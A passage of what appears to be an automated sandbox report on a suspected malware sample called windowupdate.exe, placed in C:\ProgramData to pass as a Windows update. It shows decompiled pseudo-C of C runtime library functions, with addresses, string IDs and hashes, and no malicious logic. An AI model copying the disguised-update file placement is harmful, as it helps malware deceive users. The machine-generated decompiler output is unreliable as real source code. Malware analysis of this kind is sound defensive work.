							_t116 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_parsing.cpp", 0x14a, 0, L"%ls", L"mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments");
							_t159 = _t159 + 0x18;
							__eflags = _t116 - 1;
							if(_t116 == 1) {
								asm("int3");
							}
						}
						__eflags = _v32;
						if(_v32 != 0) {
							_push(0);
							E00D8B670();
							_v52 = 0x104;
							_v56 = 0;
							E00D8ACA0( &_v56, "C:\ProgramData\windowupdate.exe",  &_v52);
							_v60 = 0xf20718;
							E00D8B3E0( &_v60);
							_push(0);
							_v20 = E00D8B770();
							__eflags = _v20;
							if(_v20 == 0) {
								L14:
								_v36 = 0xf20718;
								L15:
								_v40 = _v36;
								_v12 = 0;
								_v24 = 0;
								E00D8ACE0(_v40, 0, 0,  &_v12,  &_v24);
								E00D8B460( &_v8, E00D8B890(_t156, _v12, _v24, 1));
								_t84 = E00D8B520( &_v8);
								__eflags = _t84 & 0x000000ff;
								if((_t84 & 0x000000ff) != 0) {
									_v44 = E00D8B6D0( &_v8);
									_v68 = E00D8B6D0( &_v8) + _v12 * 4;
									E00D8ACE0(_v40, _v44, _v68,  &_v12,  &_v24);
									__eflags = _a4 - 1;
									if(_a4 != 1) {
										E00D8B480( &_v16, 0);
										_v48 = E00D8B690(_v44, E00D8B730( &_v16));
										__eflags = _v48;
										if(_v48 == 0) {
											 *0xf2153c = E00D8B590(E00D8B440( &_v84,  &_v16));
											_t97 = E00D8B610( &_v16);
											_push(0);
											 *((intOrPtr*)(E00D8B750())) = _t97;
											_v80 = 0;
											E00D8B4E0( &_v16);
											E00D8B4C0( &_v8);
											return _v80;
										}
										_v76 = _v48;
										E00D8B4E0( &_v16);
										E00D8B4C0( &_v8);
										return _v76;
									}
									 *0xf2153c = _v12 - 1;
									_t105 = E00D8B5E0( &_v8);
									_push(0);
									 *((intOrPtr*)(E00D8B750())) = _t105;
									_v72 = 0;
									E00D8B4C0( &_v8);
									return _v72;
								}
								 *((intOrPtr*)(L00D82F70( &_v8))) = 0xc;
								_v64 = 0xc;
								E00D8B4C0( &_v8);
								return _v64;
							}
							_t112 = _v20;
							__eflags =  *_t112;
							if( *_t112 == 0) {
								goto L14;
							}
							_v36 = _v20;
							goto L15;
						} else {
							 *((intOrPtr*)(L00D82F70(_t118))) = 0x16;
							E00D82900(L"mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments", L"common_configure_argv", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_parsing.cpp", 0x14a, 0);
							return 0x16;
						}
					}
					__eflags = _a4 - 1;
					if(_a4 == 1) {
						goto L5;
					}
					_v28 = 0;
					goto L6;
				}
				return 0;
			}































                      0x00d8a760
                      0x00d8a760
                      0x00d8a76d
                      0x00d8a776
                      0x00d8a77a
                      0x00d8a78b
                      0x00d8a78b
                      0x00d8a792
                      0x00d8a795
                      0x00d8a798
                      0x00d8a79c
                      0x00d8a7b6
                      0x00d8a7bb
                      0x00d8a7be
                      0x00d8a7c1
                      0x00d8a7c3
                      0x00d8a7c3
                      0x00d8a7c1
                      0x00d8a7c4
                      0x00d8a7c8
                      0x00d8a7fd
                      0x00d8a7ff
                      0x00d8a807
                      0x00d8a80e
                      0x00d8a822
                      0x00d8a838
                      0x00d8a83f
                      0x00d8a847
                      0x00d8a851
                      0x00d8a854
                      0x00d8a858
                      0x00d8a875
                      0x00d8a875
                      0x00d8a87c
                      0x00d8a87f
                      0x00d8a882
                      0x00d8a889
                      0x00d8a8a0
                      0x00d8a8be
                      0x00d8a8c6
                      0x00d8a8ce
                      0x00d8a8d0
                      0x00d8a8fc
                      0x00d8a90d
                      0x00d8a924
                      0x00d8a92c
                      0x00d8a930
                      0x00d8a970
                      0x00d8a98a
                      0x00d8a98d
                      0x00d8a991
                      0x00d8a9c1
                      0x00d8a9c9
                      0x00d8a9d0
                      0x00d8a9da
                      0x00d8a9dc
                      0x00d8a9e6
                      0x00d8a9ee
                      0x00000000
                      0x00d8a9f3
                      0x00d8a996
                      0x00d8a99c
                      0x00d8a9a4
                      0x00000000
                      0x00d8a9a9
                      0x00d8a938
                      0x00d8a941
                      0x00d8a948
                      0x00d8a952
                      0x00d8a954
                      0x00d8a95e
                      0x00000000
                      0x00d8a963
                      0x00d8a8d7
                      0x00d8a8dd
                      0x00d8a8e7
                      0x00000000
                      0x00d8a8ec
                      0x00d8a862
                      0x00d8a869
                      0x00d8a86b
                      0x00000000
                      0x00000000
                      0x00d8a870
                      0x00000000
                      0x00d8a7ca
                      0x00d8a7cf
                      0x00d8a7eb
                      0x00000000
                      0x00d8a7f3
                      0x00d8a7c8
                      0x00d8a77c
                      0x00d8a780
                      0x00000000
                      0x00000000
                      0x00d8a782
                      0x00000000
                      0x00d8a782
                      0x00000000

                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$C:\ProgramData\windowupdate.exe$common_configure_argv$minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp$mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments
                      • API String ID: 0-3664916958
                      • Opcode ID: 4c34c17d07a92d12a8e64dbe4790661ea24f372ef244b5111366b3c317a6d2b9
                      • Instruction ID: d5d53285b68e746b451573a37193806b60dfc35b278ada97dc7dc50977051b32
                      • Opcode Fuzzy Hash: 4c34c17d07a92d12a8e64dbe4790661ea24f372ef244b5111366b3c317a6d2b9
                      • Instruction Fuzzy Hash: EC7130B5D0020CABEB14FF98D856BEEB7B4EF54314F14415AE1016B292EB749A44CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D4D500 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 153COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 83%
                      			E00D4D500(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed int _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v28;
				void* _t75;
				void* _t76;
				signed char _t77;
				void* _t80;
				void* _t87;
				signed char _t88;
				void* _t126;
				void* _t127;
				void* _t130;
				void* _t131;

				_t125 = __esi;
				_t124 = __edi;
				_t91 = __ecx;
				_t90 = __ebx;
				E00D4E290(__ecx, _a12);
				_t127 = _t126 + 4;
				if( *((intOrPtr*)(E00D4C670(__ebx, _t91, __edi, __esi) + 0x20)) != 0 ||  *_a4 == 0xe06d7363 ||  *_a4 == 0x80000026) {
					L6:
					if(( *(_a4 + 4) & 0x00000066) == 0) {
						E00D4D6F0( &_v28, _a20, 0);
						if(E00D4E140( &_v28) != 0) {
							L16:
							if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) < 3 ||  *((intOrPtr*)(_a4 + 0x14)) <= 0x19930522) {
								L21:
								E00D4CD60(_t90, _t124, _t125, _a4, _a8, _a12, _a16, _a20, _a32 & 0x000000ff, _a24, _a28);
								L22:
								return 1;
							} else {
								_v8 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 8));
								if(_v8 == 0) {
									goto L21;
								}
								_v16 = _v8;
								_v12 = _v16;
								 *0xdc62b0(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32 & 0x000000ff);
								_v20 = _v12();
								return _v20;
							}
						}
						_t75 = E00D4E130(_a20);
						_t130 = _t127 + 4;
						if(_t75 < 0x19930521) {
							L14:
							_t106 = _a20;
							_t76 = E00D4E130(_a20);
							_t131 = _t130 + 4;
							if(_t76 < 0x19930522) {
								goto L22;
							}
							_t77 = E00D4E190(_t106, _a20);
							_t127 = _t131 + 4;
							if((_t77 & 0x000000ff) == 0) {
								goto L22;
							}
							goto L16;
						}
						_t80 = E00D4E100(_a20);
						_t127 = _t130 + 4;
						if(_t80 != 0) {
							goto L16;
						}
						goto L14;
					}
					if(E00D4DF10(_a16, _a20) != 0 && _a24 == 0) {
						E00D4DD70(_a8, _a16, _a20);
					}
					return 1;
				} else {
					_t87 = E00D4E130(_a20);
					_t127 = _t127 + 4;
					if(_t87 < 0x19930522) {
						goto L6;
					}
					_t88 = E00D4E160(_a20, _a20);
					_t127 = _t127 + 4;
					if((_t88 & 0x000000ff) == 0) {
						goto L6;
					}
					return 1;
				}
			}


















                      0x00d4d500
                      0x00d4d500
                      0x00d4d500
                      0x00d4d500
                      0x00d4d50a
                      0x00d4d50f
                      0x00d4d51b
                      0x00d4d563
                      0x00d4d56c
                      0x00d4d5af
                      0x00d4d5be
                      0x00d4d611
                      0x00d4d61a
                      0x00d4d687
                      0x00d4d6a8
                      0x00d4d6b0
                      0x00000000
                      0x00d4d631
                      0x00d4d63a
                      0x00d4d641
                      0x00000000
                      0x00000000
                      0x00d4d646
                      0x00d4d66d
                      0x00d4d673
                      0x00d4d67f
                      0x00000000
                      0x00d4d682
                      0x00d4d61a
                      0x00d4d5c4
                      0x00d4d5c9
                      0x00d4d5d1
                      0x00d4d5e3
                      0x00d4d5e3
                      0x00d4d5e7
                      0x00d4d5ec
                      0x00d4d5f4
                      0x00000000
                      0x00000000
                      0x00d4d5fe
                      0x00d4d603
                      0x00d4d60b
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d4d60b
                      0x00d4d5d7
                      0x00d4d5dc
                      0x00d4d5e1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d4d5e1
                      0x00d4d580
                      0x00d4d594
                      0x00d4d599
                      0x00000000
                      0x00d4d533
                      0x00d4d537
                      0x00d4d53c
                      0x00d4d544
                      0x00000000
                      0x00000000
                      0x00d4d54a
                      0x00d4d54f
                      0x00d4d557
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d4d559

                      APIs
                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 00D4D50A
                        • Part of subcall function 00D4E290: __guard_icall_checks_enforced.LIBCMTD ref: 00D4E296
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4D512
                      • __FrameHandler3::isEHs.LIBVCRUNTIMED ref: 00D4D54A
                      • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIMED ref: 00D4D594
                      • _Smanip.LIBCPMTD ref: 00D4D5AF
                      • __FrameHandler3::isNoExcept.LIBVCRUNTIMED ref: 00D4D5FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Frame$Handler3::is$EmptyExceptHandler3::SmanipStateUnwind___except_validate_context_record___vcrt_getptd__guard_icall_checks_enforced
                      • String ID: csm$csm
                      • API String ID: 2671830719-3733052814
                      • Opcode ID: c45ba9bca224981de7708531827a12a5bf300acdc330e5705926cd19ae3c4be0
                      • Instruction ID: 5f23191036a2a37808e5a213c8089501f2fe8491bbabb21484a1c61297c87d59
                      • Opcode Fuzzy Hash: c45ba9bca224981de7708531827a12a5bf300acdc330e5705926cd19ae3c4be0
                      • Instruction Fuzzy Hash: AA512BB5A00109ABDF04DF99D885AAF77BAAF58304F188558F9098B241EB34ED51CBF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D4D280 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 90%
                      			E00D4D280(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int* _v8;
				intOrPtr _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v64;
				char _v68;
				void* __esi;
				intOrPtr* _t56;
				signed char _t61;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t125;
				void* _t126;

				_t123 = __edi;
				_t84 = __ebx;
				_t56 = _a4;
				if( *_t56 == 0x80000003) {
					return _t56;
				}
				if( *((intOrPtr*)(E00D4C670(__ebx, __ecx, __edi, _t124) + 8)) != 0) {
					_t78 = E00D4C670(__ebx, __ecx, __edi, _t124);
					_t124 = _t78;
					_t79 = E00D4E220(0);
					_t125 = _t125 + 4;
					if( *((intOrPtr*)(_t78 + 8)) != _t79 &&  *_a4 != 0xe0434f4d &&  *_a4 != 0xe0434352) {
						_t83 = E00D49820(_a4, _a8, _a12, _a16, _a20, _a28, _a32);
						_t125 = _t125 + 0x1c;
						if(_t83 != 0) {
							return _t83;
						}
					}
				}
				E00D4D6F0( &_v24, _a20, 0);
				if(E00D4E140( &_v24) <= 0) {
					L00D90DE0(_t84,  &_v24, _t123, _t124);
				}
				_t61 = E00D4E140( &_v24);
				if(_t61 > 0) {
					E00D496D0(_t84, _t123, _t124,  &_v48,  &_v24, _a24, _a16, _a20, _a28);
					_t126 = _t125 + 0x18;
					_v16 = _v48;
					_v12 = _v44;
					while(1) {
						_t61 = E00D4D950( &_v16,  &_v40);
						if((_t61 & 0x000000ff) == 0) {
							goto L23;
						}
						E00D4D8C0( &_v16,  &_v68);
						if(_v68 > _a24 || _a24 > _v64) {
							goto L13;
						} else {
							_push(0);
							_push(0);
							E00D4D6C0( &_v32,  &_v68);
							_v8 = E00D4E110( &_v32);
							if(_v8[1] == 0 ||  *((char*)(_v8[1] + 8)) == 0) {
								if(( *_v8 & 0x00000040) == 0) {
									_push(0);
									_push(1);
									E00D4CC90(_a4, _a8, _a12, _a16, _a20, _v8, 0,  &_v68, _a28, _a32);
									_t126 = _t126 + 0x30;
									goto L13;
								} else {
									goto L21;
								}
							} else {
								L21:
								L13:
								E00D4D930( &_v16);
								continue;
							}
						}
						goto L23;
					}
				}
				L23:
				return _t61;
			}





















                      0x00d4d280
                      0x00d4d280
                      0x00d4d287
                      0x00d4d290
                      0x00000000
                      0x00000000
                      0x00d4d2a0
                      0x00d4d2a2
                      0x00d4d2a7
                      0x00d4d2ab
                      0x00d4d2b0
                      0x00d4d2b6
                      0x00d4d2ea
                      0x00d4d2ef
                      0x00d4d2f4
                      0x00000000
                      0x00000000
                      0x00d4d2f4
                      0x00d4d2b6
                      0x00d4d304
                      0x00d4d313
                      0x00d4d317
                      0x00d4d317
                      0x00d4d31f
                      0x00d4d326
                      0x00d4d344
                      0x00d4d349
                      0x00d4d352
                      0x00d4d355
                      0x00d4d362
                      0x00d4d369
                      0x00d4d373
                      0x00000000
                      0x00000000
                      0x00d4d380
                      0x00d4d38b
                      0x00000000
                      0x00d4d397
                      0x00d4d397
                      0x00d4d399
                      0x00d4d3a2
                      0x00d4d3af
                      0x00d4d3b9
                      0x00d4d3da
                      0x00d4d3e1
                      0x00d4d3e3
                      0x00d4d40b
                      0x00d4d410
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d4d3dc
                      0x00d4d3dc
                      0x00d4d35a
                      0x00d4d35d
                      0x00000000
                      0x00d4d35d
                      0x00d4d3b9
                      0x00000000
                      0x00d4d38b
                      0x00d4d362
                      0x00d4d41c
                      0x00d4d41c

                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4D297
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4D2A2
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd
                      • String ID: MOC$RCC
                      • API String ID: 984050374-2084237596
                      • Opcode ID: c73bb0183ecdf91fe604f38042492638d038765aa04ba797440bf0163dd74fdd
                      • Instruction ID: 922d6fd3411def0ec9c16ec9902725b2ad8922b27f1e1a4169a3b8cdbed0d55e
                      • Opcode Fuzzy Hash: c73bb0183ecdf91fe604f38042492638d038765aa04ba797440bf0163dd74fdd
                      • Instruction Fuzzy Hash: 80510C71A00109EBCB04DF98D895EEE77BABF48300F188159F91AA7291DB34ED41CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D5B750 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 134COMMON
                      Download Yara Rule
                      C-Code - Quality: 94%
                      			E00D5B750(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t39;
				void* _t43;
				void* _t50;
				void* _t52;
				void* _t60;
				void* _t61;

				_t52 = __ecx;
				if(_a16 == 0) {
					return 0;
				}
				__eflags = _a4;
				if(_a4 == 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_v12 = _v8;
				__eflags = _v12;
				if(__eflags == 0) {
					_t50 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x1c, 0, L"%ls", L"destination != nullptr");
					_t60 = _t60 + 0x18;
					__eflags = _t50 - 1;
					if(_t50 == 1) {
						asm("int3");
					}
				}
				__eflags = _v12;
				if(_v12 != 0) {
					__eflags = _a12;
					if(_a12 == 0) {
						L12:
						_t53 = _a4;
						E00D5B920(_a4, _a4, 0, _a8);
						_t61 = _t60 + 0xc;
						__eflags = _a12;
						if(_a12 == 0) {
							_v16 = 0;
						} else {
							_v16 = 1;
						}
						_v20 = _v16;
						__eflags = _v20;
						if(__eflags == 0) {
							_t43 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x23, 0, L"%ls", L"source != nullptr");
							_t61 = _t61 + 0x18;
							__eflags = _t43 - 1;
							if(_t43 == 1) {
								asm("int3");
							}
						}
						__eflags = _v20;
						if(_v20 != 0) {
							_t54 = _a8;
							__eflags = _a8 - _a16;
							if(_a8 < _a16) {
								_v24 = 0;
							} else {
								_v24 = 1;
							}
							_v28 = _v24;
							__eflags = _v28;
							if(__eflags == 0) {
								_t39 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x24, 0, L"%ls", L"size_in_elements >= count");
								_t61 = _t61 + 0x18;
								__eflags = _t39 - 1;
								if(_t39 == 1) {
									asm("int3");
								}
							}
							__eflags = _v28;
							if(_v28 != 0) {
								return 0x16;
							} else {
								 *((intOrPtr*)(L00D82F70(_t54))) = 0x22;
								E00D82900(L"size_in_elements >= count", L"wmemcpy_s", L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x24, 0);
								return 0x22;
							}
						} else {
							 *((intOrPtr*)(L00D82F70(_t53))) = 0x16;
							E00D82900(L"source != nullptr", L"wmemcpy_s", L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x23, 0);
							return 0x16;
						}
					}
					__eflags = _a8 - _a16;
					if(_a8 >= _a16) {
						E00D5B730(_a4, _a12, _a16);
						__eflags = 0;
						return 0;
					}
					goto L12;
				} else {
					 *((intOrPtr*)(L00D82F70(_t52))) = 0x16;
					E00D82900(L"destination != nullptr", L"wmemcpy_s", L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x1c, 0);
					return 0x16;
				}
			}















                      0x00d5b750
                      0x00d5b75c
                      0x00000000
                      0x00d5b75e
                      0x00d5b765
                      0x00d5b769
                      0x00d5b774
                      0x00d5b76b
                      0x00d5b76b
                      0x00d5b76b
                      0x00d5b77e
                      0x00d5b781
                      0x00d5b785
                      0x00d5b79c
                      0x00d5b7a1
                      0x00d5b7a4
                      0x00d5b7a7
                      0x00d5b7a9
                      0x00d5b7a9
                      0x00d5b7a7
                      0x00d5b7aa
                      0x00d5b7ae
                      0x00d5b7e0
                      0x00d5b7e4
                      0x00d5b7f2
                      0x00d5b7f8
                      0x00d5b7fc
                      0x00d5b801
                      0x00d5b804
                      0x00d5b808
                      0x00d5b813
                      0x00d5b80a
                      0x00d5b80a
                      0x00d5b80a
                      0x00d5b81d
                      0x00d5b820
                      0x00d5b824
                      0x00d5b83b
                      0x00d5b840
                      0x00d5b843
                      0x00d5b846
                      0x00d5b848
                      0x00d5b848
                      0x00d5b846
                      0x00d5b849
                      0x00d5b84d
                      0x00d5b87f
                      0x00d5b882
                      0x00d5b885
                      0x00d5b890
                      0x00d5b887
                      0x00d5b887
                      0x00d5b887
                      0x00d5b89a
                      0x00d5b89d
                      0x00d5b8a1
                      0x00d5b8b8
                      0x00d5b8bd
                      0x00d5b8c0
                      0x00d5b8c3
                      0x00d5b8c5
                      0x00d5b8c5
                      0x00d5b8c3
                      0x00d5b8c6
                      0x00d5b8ca
                      0x00000000
                      0x00d5b8cc
                      0x00d5b8d1
                      0x00d5b8ea
                      0x00000000
                      0x00d5b8f2
                      0x00d5b84f
                      0x00d5b854
                      0x00d5b86d
                      0x00000000
                      0x00d5b875
                      0x00d5b84d
                      0x00d5b7e9
                      0x00d5b7ec
                      0x00d5b90c
                      0x00d5b914
                      0x00000000
                      0x00d5b914
                      0x00000000
                      0x00d5b7b0
                      0x00d5b7b5
                      0x00d5b7ce
                      0x00000000
                      0x00d5b7d6

                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$destination != nullptr$minkernel\crts\ucrt\src\appcrt\string\wmemcpy_s.cpp$size_in_elements >= count$source != nullptr$wmemcpy_s
                      • API String ID: 0-1746489773
                      • Opcode ID: e48faa4d39c90160a751b4a25a0ea8e199537eaa609f310c8feb522972aa10e7
                      • Instruction ID: 8e72d6a7f75cfb3dc677c681697a06c689165e14268aff28f059f35714beb7c9
                      • Opcode Fuzzy Hash: e48faa4d39c90160a751b4a25a0ea8e199537eaa609f310c8feb522972aa10e7
                      • Instruction Fuzzy Hash: 4D419670E80309AFDF20AE94CC5AFAE76A09B54716F145059FD01371C2D3B59A888BB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D58D00 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 127COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 80%
                      			E00D58D00(void* __ebx, void* __edi, void* __esi, signed char _a4) {
				signed int _v8;
				char _v24;
				signed char _v25;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				signed char _v76;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				signed int _t45;
				char* _t47;
				intOrPtr _t50;
				char* _t76;
				intOrPtr _t93;
				intOrPtr _t95;
				signed int _t98;

				_t97 = __esi;
				_t96 = __edi;
				_t74 = __ebx;
				_t45 =  *0xdf600c; // 0x71e60372
				_v8 = _t45 ^ _t98;
				_t47 =  *0xf20640; // 0x0
				if( *_t47 != 0x58) {
					_t76 =  *0xf20640; // 0x0
					_t92 =  *_t76;
					if(_t92 != 0x3f) {
						E00D56AB0(__ebx, __edi, __esi, _a4, E00D4F3F0( &_v104));
						_t50 = _a4;
					} else {
						E00D57C80(__ebx, __edi, __esi,  &_v56);
						if(E00D5A510() == 0 ||  *0xf20650 == 0) {
							_v80 = E00D50060("`template-parameter", 0x13);
							_v76 = _t92;
							_t92 =  &_v96;
							_v48 = E00D4FAA0( &_v96,  &_v80,  &_v56);
							E00D4FBB0(_v48, _a4, 0x27);
							_t50 = _a4;
						} else {
							E00D57D80( &_v56,  &_v24, 0x10);
							_t93 =  *0xf20650; // 0x0
							_v40 = _t93;
							_v32 = _v40;
							 *0xdc62b0(E00D92B00( &_v24));
							_v36 = _v32();
							if(_v36 == 0) {
								_v72 = E00D50060("`template-parameter", 0x13);
								_v68 = _t93;
								_v44 = E00D4FAA0( &_v88,  &_v72,  &_v56);
								_t92 = _a4;
								E00D4FBB0(_v44, _a4, 0x27);
								_t50 = _a4;
							} else {
								_t92 = 0;
								_v25 = 0;
								_push(_v25 & 0x000000ff);
								E00D4E750(_a4, _v36);
								_t50 = _a4;
							}
						}
					}
				} else {
					_t95 =  *0xf20640; // 0x0
					_t92 = _t95 + 1;
					 *0xf20640 = _t92;
					_v64 = E00D50060("void", 4);
					_v60 = _t92;
					E00D4F1F0(_a4,  &_v64);
					_t50 = _a4;
				}
				return E00D47280(_t50, _t74, _v8 ^ _t98, _t92, _t96, _t97);
			}




























                      0x00d58d00
                      0x00d58d00
                      0x00d58d00
                      0x00d58d06
                      0x00d58d0d
                      0x00d58d10
                      0x00d58d1b
                      0x00d58d5a
                      0x00d58d60
                      0x00d58d66
                      0x00d58e83
                      0x00d58e8b
                      0x00d58d6c
                      0x00d58d70
                      0x00d58d7f
                      0x00d58e44
                      0x00d58e47
                      0x00d58e52
                      0x00d58e5e
                      0x00d58e6a
                      0x00d58e6f
                      0x00d58d92
                      0x00d58d9b
                      0x00d58da0
                      0x00d58da6
                      0x00d58db9
                      0x00d58dbf
                      0x00d58dcb
                      0x00d58dd2
                      0x00d58e03
                      0x00d58e06
                      0x00d58e1d
                      0x00d58e22
                      0x00d58e29
                      0x00d58e2e
                      0x00d58dd4
                      0x00d58dd4
                      0x00d58dd6
                      0x00d58ddd
                      0x00d58de5
                      0x00d58dea
                      0x00d58dea
                      0x00d58dd2
                      0x00d58d7f
                      0x00d58d1d
                      0x00d58d1d
                      0x00d58d23
                      0x00d58d26
                      0x00d58d3b
                      0x00d58d3e
                      0x00d58d48
                      0x00d58d4d
                      0x00d58d4d
                      0x00d58e9b

                      APIs
                      Strings
                      Memory Dump Source
